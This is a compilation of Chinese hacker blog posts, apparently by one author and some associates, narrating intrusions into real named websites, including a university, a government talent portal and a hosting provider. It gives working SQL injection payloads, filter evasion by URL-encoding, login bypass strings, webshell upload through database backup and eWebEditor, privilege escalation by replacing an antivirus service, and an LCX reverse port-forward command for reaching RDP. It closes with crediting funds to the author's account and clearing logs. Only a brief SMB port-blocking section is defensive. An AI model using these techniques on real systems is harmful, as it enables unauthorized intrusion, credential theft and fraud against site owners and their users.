SpookZanG

来源: baoz.net

这个smb 0day漏洞出了很久了，由于包子工作实在是太忙，一直没有花心思关注它。该漏洞影响vista、windows7和windows 2008，EXP现在想必大家手上该有的也有了，有人测试过可以很好的攻击vista和2008。

先说说内网渗透吧。在渗透的过程里，第一个需要面对的问题就是：我们如何快速定位到windows 2008、windows7和vista。我这里提供两个思路：

1、扫描windows SMB的版本，例如windows7就是6.1，工具大家自己去找找吧；为了和谐，包子就不透露可以扫SMB版本的程序名称了。

、如果你找不到SMB版本扫描器，你可以尝试扫描IIS的版本。这个方法相对简单也准确，80的扫描器多了去了。

顺带提醒一下，大范围扫描很容易触发警报，特别是在这个特殊的时期，说不定是安全工作者放长线钓大鱼的时候，一扫就被发现了。我相信渗透经验丰富的你一定可以通过非扫描的途径发现网络里啥机器是可以动的 ：）

在你进入到一个系统之后，请参考《如何攻击windows域》来控制整个网络。http://baoz.net/how-to-attack-a-windows-domain/ 。

至于防御，思路很简单，实施起来很复杂：封135-139,445端口。

封这几个端口的方案也很多，大概说说其中利弊：

1、通过路由交换设备封。长处是不需要操作终端，不容易出问题，终端用户也无法修改策略；短处是封堵颗粒太大，无法做到全PC到PC的访问控制。还有如果有例外的用户，操作和审计起来也相当麻烦。如果你可以强制下发此策略，并且安全容忍度高，这个是最优选择。

2、通过本机的防火墙来封堵，例如SEP、MCAFEE等。长处是可以统一下发策略，例外用户也好控制；短处是系统有可能需要为此付出性能代价。

3、通过activex控制ipsec策略封堵。长处是统一下发、例外灵活、控制点细致、控制力度强、对系统影响小；短处是用户有可能关闭IPSEC服务，但这个短处是可以很好的规避的：初次安装自动开启ipsec服务，定期通过外部扫描或者OA系统上调用activex检查和开启ipsec服务。当然，如果你有域的话，也可以通过域来实现。

其中后两个方案都可以做到端到端的灵活访问控制。

SpookZanG[S.c.t]

毫无技术可言，直接发图图把～

点击查看图片

作者：SpookZanG[S.C.T]

注：大型护肤品不是指 大型皮肤的保护产品 而是指这个护肤品的规模较大
注2：本文没有任何技术含量，大牛绕道。

晚上，无聊，玩魔兽世界被会长放鸽子，很是烦，于是想找个网站出出气。当时本来想搞个卫生巾的网站，然后把33的名字扔上去，后来却来到了这

个传说中的护肤品网站。

一看还是asp的，来吧注入。 于是在后面加上’，却返回了防注入程序！

点击查看图片

恩，一看就知道这个是个不错的防注入程序，我们把id换成%69%64，成功注入！

把它扔到穿山甲里，竟然判断是ACCESS数据库？莫非我进入了传说中的山寨网站？后来一看，发现了其中缘由。他整个网站都是FLASH做的，没法判

断关键字，所以软件不管用了！ 既然这里有注入点，那么根据墨菲斯托原则，在那里的某一个地方，也一定有注入点！墨菲斯托就是墨菲斯托，我

果然又发现一个注入点。

把它扔进穿山甲，果然是MSSQL的数据库，还是显错模式，这个站长真是关心人啊，要在是SA权限就更关心人了。但是最后却是db权限，db权限可以

通过备份拿到shell，但是我失败了，貌似是一句话被杀毒软件给KILL了，我们还可以这样搞——先列目录，然后找到后台，在找到密码，就成了（

传说中的MSSQL按ACCESS的搞法去搞，超级笨方法）。但是弄了将近一个小时，破网站的后台我竟然没找到。不过，这个服务器上不止他一个网站，

我搞一个好搞的，我查了一下这个网站的IP发现查不出有其他网站。但是他网站所在目录文件夹命名都是有规律的，一般按网站的域名来命名。于是

打开Google(支持google,反对baidu！！)一搜，还真搜到了

因为目录都有了，直接来到后台，尝试弱密码，成功进入。（当时想，如果弱密码进不去，就在这里找个注入点拿到密码进入）

点击查看图片

发现他有个上传附件的地方，根据墨菲斯托原则，这里弱智，那里也肯定弱智。我就直接上传ASA试试吧，果然成功了，但是不知道上传到了哪里，

我们还是得通过列目录来找。果然找到了！

然后登录shell

点击查看图片

然后再次根据墨菲斯托原则，这里弱密码，那里肯定也弱密码。尝试s-u提权，成功！

3389登录截图

最后说两句，本文中数次提到墨菲斯托和墨菲斯托原则，其实这个人我根本不认识，名字是瞎编的，他的原则自然也是瞎编的。

文章太菜，牛人请绕道。

作者：SpookZanG[S.c.T]

前几天，某个叫情深的MM给我发消息，让我帮他弄个站。漂亮MM发话而且他又答应跟我去开房，这必然得弄下来啊～。

于是拿到某个PHP的网站。

点击查看图片

我是一个“很勤奋”的人，所以我的格言是：能工具的就绝不手工。手工太累。所以把它扔到可爱的穿山甲里面，发现穿山甲竟然检测其为MSSQL，跟实际不相符啊～。（也有PHP与MSSQL搭配的，以前见过，不过今天不是。）这命名就是MYSQL数据库啊。

（顺便说下怎么判断是MYSQL还是MSSQL，比如他的连接是http://www.spookzang.net/index.php?id=1，你在他后面加上/*SpookZanG或者–SpookZanG，看哪个能正常显示，前者正常显示就为MYSQL  后者正常显示就为MSSQL）

这时，情MM发来信息说找到了表，但是找不到列。而且能读出文件来。

点击查看图片

既然能读文件，我们就来读取一下可能包含数据库帐号密码的文件。一般登录文件都会调用包含数据库帐号密码的文件。
我先读了login_act.php

<!--p
session_start();
 
Header("Content-type: text/html; charset=GB2312");
 
require "title.php";
 
$mod = $_REQUEST['mod'];
 
$mod=empty($mod)?'out':$mod;
 
  switch($mod){
 
  case 'out':
 
    $RegUse-->Logout();
 
  break;
 
  case 'in':
 
    $env=" and publish='1'";
 
    $RegUser-&gt;setUserEnv($env);
 
    $RegUser-&gt;Login($_POST['usr'],$_POST['pwd']);
 
  break;
 
}
?&gt;

发现里面包含了title.php。并发现$RegUser含有uer和pwd。我们在来读title.php

<!--define('__SYSTEM_ROOT', '../');
 
include __SYSTEM_ROOT.'framework_gb/framework.php';
using('System.Web.UI.Handle');
using('System.Web.UI.Handle_new');
using('System.Web.UI.Toolbar');
using('System.Data.Data');
using('System.Data.Plugins.Option');
using('System.Smarty.Smarty');
using('System.Functions.Functions');
 
require_once __SYSTEM_ROOT."global.php";
using('System.User.User');
 
$RegUser=new User($_globa-->table-&gt;user,'content_name','content_pass');
 
$Sarray=array('userid'=&gt;'auto_id',
            'user_name'=&gt;'content_name',
            'role_id'=&gt;'role_id',
            );
 
$RegUser-&gt;setSessArray($Sarray);
 
?&gt;

这时，我们就知道了他的列名了，分别为’content_name’和’content_pass’。而且他里面还有global.php这个文件。

我来读一下这个文件global.php

<!--p
 
@session_start();
/*
* Created on 2005-11-27
*
* To change the template for this generated file go to
* Window - Preferences - PHPeclipse - PHP - Code Templates
*/
define('_ACCESS_VALID', 1);
 
/**
* 打开所有错误选项
*/
 
/*
ini_set('display_errors', 1);
error_reporting(E_ALL ^E_NOTICE);
*/
/**
* 系统绝对路径
*/
if (!defined('SYSTEM_ROOT'))
define('SYSTEM_ROOT', dirname(__FILE__));
 
if (!defined('TMP_ROOT'))
define('TMP_ROOT', SYSTEM_ROOT.DIRECTORY_SEPARATOR.'tmp'.DIRECTORY_SEPARATOR);
 
/**
* 系统相对路径
*/
if (!defined('__SYSTEM_ROOT'))
define('__SYSTEM_ROOT', '');
 
if(!defined('SYSTEM_UPLOADS_DIR'))
define('SYSTEM_UPLOADS_DIR',SYSTEM_ROOT.'/file/upload/');
define('_SYSTEM_UPLOADS_DIR',__SYSTEM_ROOT.'/file/upload/');
 
define('_NOIMG',SYSTEM_ROOT.'/images/nophoto.gif');
define('CODE_DIR',SYSTEM_ROOT.'/code/');
 
/**
* 定义时间常量
* @final LONG_DATE
* @final SHORT_DATE
* @final SERVER_TIME
*/
define('LONG_DATE', date('Y-m-d H:i:s'));
define('SHORT_DATE', date('Y-m-d'));
define('SERVER_TIME', date('H:i:s'));
 
/**
* 常用服务器配置常?Y
* @final ENV_MAGIC_QUOTES_GPC
* @final ENV_OUTPUT_BUFFERING
* @final ENV_REGISTER_GLOBALS
* @final ENV_SESSION_LIFETIME
* @final ENV_UPLOAD_MAX_FILESIZE
*/
define('ENV_MAGIC_QUOTES_GPC', (int) ini_get('magic_quotes_gpc'));
define('ENV_OUTPUT_BUFFERING', (int) ini_get('output_buffering'));
define('ENV_REGISTER_GLOBALS', (int) ini_get('register_globals'));
define('ENV_SESSION_LIFETIME', (int) ini_get('session.cookie_lifetime'));
define('ENV_UPLOAD_MAX_FILESIZE', (int) ini_get('upload_max_filesize'));
 
/**
* 系统常用路径常量
* @final SYSTEM_UPLOADS_DIR
*/
 
include SYSTEM_ROOT.DIRECTORY_SEPARATOR.'config.php';
include SYSTEM_ROOT.DIRECTORY_SEPARATOR.'vars.php';
 
//模板
$smarty = new Smarty();
$smart-->template_dir = $SmartyCfg['TEMPLATE_DIR'];
$smarty-&gt;compile_dir = $SmartyCfg['COMPILE_DIR'];
$smarty-&gt;config_dir = $SmartyCfg['CONFIGS_DIR'];
$smarty-&gt;cache_dir = $SmartyCfg['CACHE_DIR'];
$smarty-&gt;left_delimiter = $SmartyCfg['LEFT_DELIMITER'];
$smarty-&gt;right_delimiter = $SmartyCfg['RIGHT_DELIMITER'];
$smarty-&gt;caching = false;
$smarty-&gt;compile_check = true;
$smarty-&gt;debugging = false;
 
$_tpl = new StdClass();
 
$_tpl-&gt;site="site/";
$_tpl-&gt;lib=$_tpl-&gt;site."lib/";
 
$_tpl-&gt;header=$_tpl-&gt;site."lib/header.htm";
$_tpl-&gt;footer=$_tpl-&gt;site."lib/footer.htm";
 
define('NEWIMG',$config-&gt;LiveSite.'/images/05062003011.gif');
 
define('NEWDATE',3);
 
//数据
 
$Data = new Data();
$Data-&gt;Open($DBType,$DBCfg);
$Data_Sec = new Data();
$Data_Sec-&gt;Open($DBType,$DBCfg);
 
$_global = new StdClass();
 
$_global-&gt;table = new StdClass();
 
/**
*
* 取得框架相对路径
*/
$_global-&gt;framework_path = new StdClass();
$_global-&gt;framework_path-&gt;System = getPath('System');
$_global-&gt;framework_path-&gt;FCKeditor = getPath('System.Web.UI.FCKeditor');
$_global-&gt;framework_path-&gt;Htmledit = getPath('System.Web.UI.Htmledit');
$_global-&gt;framework_path-&gt;Upload = getPath('System.Upload');
$_global-&gt;framework_path-&gt;Dtree = getPath('System.Web.UI.Dtree');
$smarty-&gt;assign('framework_path',$_global-&gt;framework_path);
 
$_global-&gt;table-&gt;admin_role = 'sys_role';
$_global-&gt;table-&gt;module = 'sys_module';
$_global-&gt;table-&gt;defmodule = 'sys_plugin';
 
$_global-&gt;table-&gt;user = 'sys_user';
$_global-&gt;table-&gt;news_content = 'news';
$_global-&gt;table-&gt;news_class='sys_module';
$_global-&gt;table-&gt;news_info='news';
$_global-&gt;table-&gt;article_content = 'article';
$_global-&gt;table-&gt;share_price = 'share_price';
$_global-&gt;table-&gt;pdf_content = 'pdf';
$_global-&gt;table-&gt;video_content = 'video';
$_global-&gt;table-&gt;person_content = 'person';
$_global-&gt;table-&gt;guest_content = 'guest';
$_global-&gt;table-&gt;vars="vars";
 
$_global-&gt;table-&gt;productmodule = 'productmodule';
$_global-&gt;table-&gt;product = 'product';
$_global-&gt;table-&gt;zhaopin = 'zhaopin';
$_global-&gt;table-&gt;vote = 'vote';
$_global-&gt;table-&gt;friendlink='friendlink';
$_global-&gt;table-&gt;focusimg='focusimg';
$_global-&gt;table-&gt;database_back="database_back";
$_global-&gt;table-&gt;mailadmin='mailadmin';
$_global-&gt;table-&gt;mailshow='sendmail_list';
 
$_global-&gt;table-&gt;guest_touch='guest_touch';
 
$_global-&gt;table-&gt;member='member';
$_global-&gt;table-&gt;cent='cent';
$_global-&gt;table-&gt;video='video';
 
$_global-&gt;form-&gt;dateimg = "../tpl/images/toolbar/html_f2.png";
$_global-&gt;form-&gt;noimg = "../tpl/images/toolbar/html_f2.png";
 
if(ENV_OUTPUT_BUFFERING&gt;0){
  ob_end_clean();
}
?&gt;

其中的include SYSTEM_ROOT.DIRECTORY_SEPARATOR.’config.php’;

他的ROOT密码 没准就在那里。

最后读出了ROOT密码和网页的管理员帐号。

不过，帐号登录不了。（administrator这个权限高的没法登录，权限低的却一点问题没有，真实匪夷所思……）

而且处于内网当中，所以root也是没有办法在外网登录。

本文只是介绍一下入侵这个网站的思路。如有错的地方，欢迎指出讨论。（特别是那个帐号无法登录的问题）

by：linzi

题记:

     有很多人不会明白我的想法，但希望我个人的技术理念能对一些人有帮助.

     把所学的东西上升为理论是为了更大限度的拓宽自已的思维，对于一个渗透者来说，思维比0day要重要多了.

     渗透其实就是对已经掌握的各种技术加上自己的思维进行排列组合.

     假说哪一天google被人入侵了，入侵的技术就是注射，很多人会说，这个我也会，没什么了不起的.

     是没什么了不起的，但为什么别人能做到用注射搞进去，而你不行，这就是区别，虚心的去学习好的理念，好的想法,

     会比报怨，嫉妒会好很多.

     在这四年里面需要感谢的人很多，看到这个文章后，想对你说，谢谢!!祝你早点好起来，还有我的朋友们^_^!

     这本书里面的技术都是一些很老的技术，文章主要给那些需要的人.牛人略过^_^!

作者:Linzi

    正文:

    例子:

    渗透某IDC技术细节:

    www.idc.com是一个很大型的IDC.渗透经过很简单.

ping www.idc.com

Pinging www.idc.com [220.181.6.19] with 32 bytes of data:

Reply from 220.181.6.19: bytes=32 time=4ms TTL=56
Reply from 220.181.6.19: bytes=32 time=3ms TTL=56
Reply from 220.181.6.19: bytes=32 time=3ms TTL=56
Reply from 220.181.6.19: bytes=32 time=5ms TTL=56

Ping statistics for 220.181.6.19:
    Packets: Sent = 4, Received = 4, Lost = 0 (0% loss),
Approximate round trip times in milli-seconds:
    Minimum = 3ms, Maximum = 5ms, Average = 3ms

    得到IP分析得到，该IP为网通线.

    一般来说，IDC都会给用户试用期,就国内来说，你通过试用，可以得到网通，电信，或双线的一个ftp,mssql,http等一些权限.

    去www.idc.com通过收集的资料，狂注册，一直注册到和主站同一IP的一个试用账号.

    得到mssql账号，backup database，直接得到一个shell

    好了例子结束.

说明开始:

    一般来说，有经验的黑客他们通过这个例子联想到，搞一个虚拟空间的站.

    a.先定位其在哪个空间商注册.

       这个很好解决whois查看域名的dns，再google一下这个dns一般就确定是在哪里注册过的了.

    b.确定IP段以及类型，如网通，电线，双线等

    c.狂注册至分配到同一IP的一个测试账号，提权或直接backup shell.

    如果我们再跳出这个思维呢?OK,现在我们把这些例子上升为一个理论，也就是所谓的旁注攻击.

===============================================================================

什么是旁注攻击:

    利用与目标相关的人或事物为跳板,迂回式的渗透目标的一个入侵手法.

    当我们把这个上升为一个理念的时候，我们再来拓宽一下思路:

    先与我们传统的所谓的“旁注攻击”开始:

    A:查出同一个服务器所绑定的域名.通过渗透同一服务器的其它虚拟空间用户，再通过提权或配置不当等方式入侵目标.

    B:通过渗透ISP的方式，迂回式的渗透目标.

    OK,现在我们再拓宽一下思维:

    与目标相关的东西一般有哪些呢?

    我们可以定位为，与目标有关联的事物都可能被成功入侵的一个细节.

St4nd & SpookZanG[S.C.T]

话说，在这秋高气爽，秋风瑟瑟，秋风送暖，秋阳杲杲的日子里，我感觉应该为建设和谐社会，建立和谐社区，维护世界和平，神9探月旅行，做点贡献，于是来到了中国国家人才网。话说这个网可不简单，是“人事部全国人才流动中心主办”的！这个中心一定非常的NB，因为我没有听说过。

点击查看图片

打开网站，发现网站是JSP的。随便打开一个连接，把它扔到穿山甲里，发现是SA的注入点！我感觉JSP搭配MSSQL的比较少见，我到是经常见到JSP+Oracle的。

点击查看图片

于是乎我非常高兴，在脑子里闪现出了无数的提权方法：执行命令拉，下载文件拉（SA权限能下载一个不大于8k的文件），写入VBS拉。等等等等。

但是呢，事情往往没有我想的那么简单。首先呢，他是内网，没法从外网连接3389，其次，这个SA不是显错模式，搞起来就比较烦人了，后期列目录，列表明啥的都得一个一个的猜，麻烦！费时！可是我是谁呢，我于是打算找个人来一起搞，先叫33，33说他在拍片，忙！又叫Demon和小T，他们都说我没接触过JSP，让我找33（你们不会是商量好的吧？）。最后终于st4nd的出现，解救了我。跟他打招呼完毕后，问他搞站么，他说搞。于是把网站注入点发了过去。

之后，我发现了一个备份网站的路径，找到了另一套程序，http://www.newjobs.com.cn/city_manager/ ，于是我抱着试一试的心态，输入’or’='or’，但是呢，不成功，返回了500错误。我感觉那个后台的确是能绕开的，没有过滤。于是乎，换成了’or”=’，正常进入。

点击查看图片

有在里面发现了ewebeditor，http://www.newjobs.com.cn//tools/ewebeditor/，似乎胜利在向我招手。但是呢，事情网网没有我想的那么简单，通过列那个备份目录发现，他根本没有登录页面，而且他这个ewebeditor全是HTML的，真烦人啊！！(他貌似有个上传的页面，但是我打开是500错误……)

这时，st4nd发来了一个“resin-3.1.5”，这个东西是什么呢？Resin是CAUCHO公司（http://www.caucho.com/）的产品，是一个非常流行的支持servlets 和jsp的引擎，速度非常快。

而在resin-3.1.5下的conf\resin.conf很可能存放着网站的路径，于是找到这个文件，拿出穿山甲，读了出来。

虽然最后没有找到路径，不过找到了SA的密码（为了防止被一些不法分子轻松利用，密码隐藏，想要自己去读。）：

1
2
3
4
5
6
7
8
9
10
11

<database>
           <jndi-name>jdbc/mysql</jndi-name>
           <driver type="com.microsoft.jdbc.sqlserver.SQLServerDriver">
             <url>jdbc:microsoft:sqlserver://localhost:1433</url>
             <user>sa</user>
             <password>XXXXXXX</password>
            </driver>
            <prepared-statement-cache-size>8</prepared-statement-cache-size>
            <max-connections>20</max-connections>
            <max-idle-time>30s</max-idle-time>
          </database>

虽然有了SA的密码，但是因为是内网，无法从外部连接。所以要用剑心写的那个web mssql连接器去搞。但是因为没有路径所以也就放置了。

因为找不到路径，st4nd就说应该用VBS提权，我感觉服务器上如果有杀软的话，VBS提权的成功率很低的。在尝试了一下后，发现服务器上果然有杀软，写上去的VBS被干掉。

到学校的第2天，st4nd发来了消息，说找到路径了，通过备份数据库弄上去了马，不过据说杀软很强大(后来知道，原来是JB金山毒霸2008)。

并给我下了最后通牒，搞下他，渗透服务器！

接到st4nd的命令，我快马加鞭，倍道而进，风驰电掣，大步流星，奔逸绝尘的回了家，打开电脑，连上shell，这个shell是JSP的，33写的，通过33的马，把自己的马弄上去，进入！

点击查看图片

还记得那个SA的密码么？ 通过他连接！
因为内网，打算上传个LCX反弹出来3389，提权。

但是呢，有杀软，弄不上去……33说他有免杀的LCX。33把LCX给我之后，我发现竟然被杀？！

我打算结束掉那个破B金山杀毒，但是失败了。

真是郁闷… …看来最近得恶补一下免杀了……

文章先发上来把，谁有能免杀的LCX或者反弹马说下，好拿下他，渗透之…….

最后说下,躺谢，趴谢，打滚谢st4nd的鼎力支持。

非常不幸，没图了，转移服务器弄掉了，然后DRT因为空间换到国外，论坛里的图片也没了，凑服看把，哪天在拿下一次。

作者：SpookZanG[D.R.T]

话说，秋天到了，天气凉了，在这收获的季节，在这金秋，我们可爱的母校迎来了三十年的校庆，这是一个美丽的季节。我们学校又组织我们去了国家体育馆，虽然我不想去，可是学校利用学分威逼利诱，没有办法，只好去了。但是，这不是我的主观意愿，所以……我要为学校在这三十年校庆之际，献上一份“厚礼”。

先打开主页http://www.buu.edu.cn/，哇，好“漂亮”的网页，先探测探测吧。随便找个连接，点开，http://www.buu.edu.cn/home/gg/news_con.jsp?fid=sph20080902111726756

在后面，分别加上 ‘ ，and 1=1  ， and 1=2。 发现有注入漏洞

看样子貌似是Orcale数据库。本打算猜一下密码和表段啥的，可是看到他简陋的页面可以断定，后台更简陋。很可能只能跨站啥的，连上传都没有。(其实开始猜解数据库了，可是每当猜解到一半，服务器上的数据库就会出错，所以就没有继续搞。)

正所谓条条大路通罗马，（至于这句话什么意思，不明白的也不必深究，因为跟入侵没关系）我们来看看别的页面。

我们打开http://news.buu.com.cn/，在搜索那里随便搜索点东西，我搜索的是3434，本来还以为得抓包，然后构造连接，但是我发现，他是直接显示的，不用构造。

http://news.buu.com.cn/xmllist/search_news.asp?newskey=3434&mtype=0&selectf=0&Submit22=%CB%D1%CB%F7

我们把 3434后面的都删除，发现删除后不能正常显示，没关系，我们还可以这样构造，把“newskey=3434”放到最后面，弄成这样:

http://news.buu.com.cn/xmllist/search_news.asp?mtype=0&selectf=0&Submit22=%CB%D1%CB%F7&newskey=3434

然后，在后门加上单引号’，出现

发现，他有防注入程序，但是呢……，他的防注入是不是会有漏洞呢？我们把newskey换成URL格式%6E%65%77%73%6B%65%79，

然后在尝试提交’ and 1=1 and 1=2，发现有注入漏洞！是DB权限，DB权限，可以通过备份得到一句话。

可是我们不知道他的路径，这怎么办呢？

我一边猜解着表名，一边查找着后台，在尝试到http://news.buu.com.cn/main.asp发现他有一个探针，显示出了路径，看来我拿到权限有望了！

把有注入的连接扔到穿山甲里，然后通过穿山甲备份数据库，但是失败了……看来这条路走不通了。(后来手工检测的时候，发现是PB权限，所以无法备份得到shell，所以说，不能太相信软件！)

正所谓条条大路通罗马，（至于这句话什么意思，不明白的也不必深究，因为跟入侵没关系）这条不成，还有别的呢～在看看别的分站。

最后来到了http://ldxsc.buu.com.cn/，我发现他似乎有EWEBEDITOR。

我在后面输入EDIT，发现出现了403错误，看来联大似乎离死不远了……

我输入http://ldxsc.buu.com.cn/taiyanyuan/edit/admin_login.asp，出现了传说中的页面，我密码尝试admin admin888 admin999。

发现都无法登入，没关系，把数据库down下来，然后破解就OK了，输入默认的数据库，db/ewebeditor.mdb，把数据库down下来，然后拿着破解的密码登录，成功！

然后通过ewebeditor的老方法拿到了webshell。

然后在服务器里进行地毯式搜查，发现他的D,E,F盘都是分站。

最后在E盘里的一个ASPX网站发现了一个有SA的帐号（Maxil发现的，我至今没有找到-_-||）

拿着SA的帐号，通过WEB版的SQL登录器登录（因为是内网，外面连不上）。成功，并且发现组件齐全。

然后执行命令netstat -an看看他都开了啥端口。

发现有3389.因为是内网，所以从外网是连不上的，但是我们可以利用LCX来帮忙。（本来打算上传个反弹的马马的但是无奈于我对于免杀这块的技术空白……所有上传的马全被可爱的卡巴给删除了。在废句话，最后拿下的时候，本想把C盘填入卡巴的可信区域，【填入可信区域，卡巴就不会扫描他拉～】，然后留个后门，弄个反弹木马啥的，但……但……但……他的卡巴竟然设了密码！！真是……唉……）

我把LCX上传上去，先在本地执行 （LCX -LISTEN 接收数据端口 转向端口）LCX -LISTEN X Y，并在WEB版SQL里执行(LCX的格式LCX的地址 -slave 你的IP 你接收的端口 他的IP 他的端口)E:\lcx.exe -slave 219.x.x.90 x 10.11.6.16 3389。

然后我用远程桌面连接127.0.0.1:Y(Y的端口不要用3389).

成功！

最后就是上传一个CAIN进行嗅探，等待着密码的降临……

写在最后：本文没有任何技术，此文是一篇入侵笔记，记录我在入侵时遇到的困难、问题以及我解决的方法。

如果本文哪里写的有错误或者有更好的方法，欢迎指出。

作者：SpookZanG

刚刚，MaxiL发来信息，问我s-u6.4有什么提权方法。

点击查看图片

我感觉S-U提权都是一样，都是通过默认密码提权。 而且除了白痴+脑子触过雷的站长以外，其他的人基本不会用默认密码。

我向他要了SHELL，上去看看。总感觉不爽。于是我做了一个伟大的决定！！！！！

上传自己的shell……

这回舒服多了。

我发现他有pcanywhere 着可是个提权的重头戏啊，哇哈哈哈哈哈。

点击查看图片

BUT，还没等我笑完（注意是笑完，不是玩笑！），MaxiL就说了，不能用～～！ 被锁定了。（给我迎头痛击。）

我让他运用社会工程学，尝试一些解锁，结果没成功。郁闷……

点击查看图片

既然没成功，我就找别的方法。正所谓 条条大路通罗马。 至于这句话什么意思，大家不必深究，这句话也根本次入侵也没太大关系。

于是我发现了万恶的瑞星。（叫你跟卡巴做对，弄死你！哇哈哈哈哈哈，卡巴万岁～！）

点击查看图片

瑞星的这个服务默认是启动的，如果我替换服务的话……

先重命名为 CCenter1.exe   然后上传我的马 名字为CCenter.exe    然后服务器重启  就会运行它了。

什么，什么?怎么让服务器重启的。

这有2种方法，NO.1 DDoS。（本来说用这招的可是没用上。下次吧。）
             NO.2 Pcanywhere

Pcanywhere ？  

对，就是Pcanywhere。

“刚刚不是被锁定了吗？”

的确被锁定了，但是他还是能执行重启，关机。

于是乎……上线啦～～

点击查看图片

然后就是添加管理员，然后跟MaxiL共享肉鸡。嘿嘿哈哈哈哈哈……

截张图嘿嘿。

点击查看图片

总结一下，其实，本人是个超级+Super+菜鸟。这次成功纯属运气。
运气一是他的瑞星的文件夹竟然可以随意重命名（顺便说一下，替换服务只能重命名，是删不掉的。）。
运气二是我没做免杀的pcshare竟然没被杀？！（做免杀太麻烦，用CCL特征码的话至少一上午，累～）。
运气三，不用DDoS可以重启。舒坦。

其实入侵就好像作数学题，要思维宽阔，要用不同思路来搞定它，不能一条路走到黑。

最后顺便说一下，替换服务一般只替换第三方服务，不要替换系统的，要不然…………

作者：SpookZanG

刚刚在入侵。

从6点半就开始搞。

先down下了数据库，然后破解密码。（动网8.0）

然后把我可爱的shell插入数据库。

改名为“123.txt”上传。

然后备份数据库。（目录填 XXX.ASP）

数据库名称填xxx.mdb

这样就利用2003的设置可以运行木马了。

然后访问 www.xxx.com/xxx.asp/xxx.mdb 用密码登录。

发现登录后直接跳转到 www.xxx.com/xxx.asp 了才发觉这样不行。

于是找来了 “一句话”

利用一句话木马，上传shell。

发现根本不成！ 每次都是缺少对象。（莫非我使错误？）

这时想起刚才上传的shell(也就是www.xxx.com/xxx.asp/xxx.mdb )这个。

利用复制功能把那个shell复制到了目录.

终于拿到了shell。

提权暂且不提。

总之,转来转去,突然想用FTP登陆下

这时发现，他竟然！！

竟然是空口令！！

真象是被玩了。

早知道，直接上传shell了。

郁闷～

因为，某人说我，老改成绩没意思，我想了想也是，改成绩哪有意思啊。于是瞎转悠，无意中在北京的BBN （www.bbn.com.cn）上看到了一个大型的电影网站，于是乎，有了下文。

随便打开一个PHP网页  提交 http://www.xxx.com.cn/wz_xi.php?id=1607 and 1=1/*(因为网页里含有色情内容，所以网站隐去，有兴趣的朋友自己去BBN上找) 返回正常页面。

http://www.spookzang.net/upload/1.jpg

提交 http://www.xxx.com.cn/wz_xi.php?id=1607 and 1=2/* 返回提示没有此电影。

http://www.spookzang.net/upload/2.jpg

 据我判断 这里有PHP注入。

我在提交 http://www.xxx.com.cn/wz_xi.php?id=1607 and ord(mid(version(),1,1))>51/*  返回了正常页面， YES！ 支持UNION查询。 呵呵，这就简单咯  嘎嘎。

然后我提交 http://www.xxx.com.cn/wz_xi.php?id=1607 order by 10/*,返回结果正常。如图

http://www.spookzang.net/upload/1.jpg

看来他字段大于10。

我在提交 http://www.xxx.com.cn/wz_xi.php?id=1607 order by 20/*,返回错误结果。

看来字段是在10－20之间。 然后经过我的一番提交，确定了他又10个字段！
然后我提交 http://www.xxx.com.cn/wz_xi.php?id=1607 and 1＝2 union select 1,2,3,4,5,6,7,8,9,10/* 返回如图所示。

http://www.spookzang.net/upload/3.jpg

这个图的意思是，用UNION查询的话，显示4的地方会显示你要的内容！。

下面就是猜解表和列了。

提交http://www.xxx.com.cn/wz_xi.php?id=1607 and 1=2 union select 1,2,3,4,5,6,7,8,9,10 from admin/*  返回正常页面，说明有ADMIN这个表。  然后猜解字段。

提交 http://www.xxx.com.cn/wz_xi.php?id=1607 and 1=2 union select 1,2,3,pass,5,6,7,8,9,10 from admin/* 这句话的意思是 让ADMIN 里的PASS字段在4这个位置显示出来。  hoho～  密码出来了

http://www.spookzang.net/upload/5.jpg

然后 提交 http://www.xxx.com.cn/wz_xi.php?id=1607 and 1=2 union select 1,2,3,userid,5,6,7,8,9,10 from admin/*  哈哈，用户名也出来了。

http://www.spookzang.net/upload/4.jpg

剩下的就是找后台了。

这就得用到 google了  在搜索里输入 admin site:www.xxx.com.cn  哈哈 后台也出来了

http://www.spookzang.net/upload/6.jpg

这时  我仿佛看见了免费的电影在向我挥手 。

然后用密码登陆  YES 成功!

http://www.spookzang.net/upload/7.jpg

剩下的当然就是给自己的电影帐号加钱，然后清理日志走人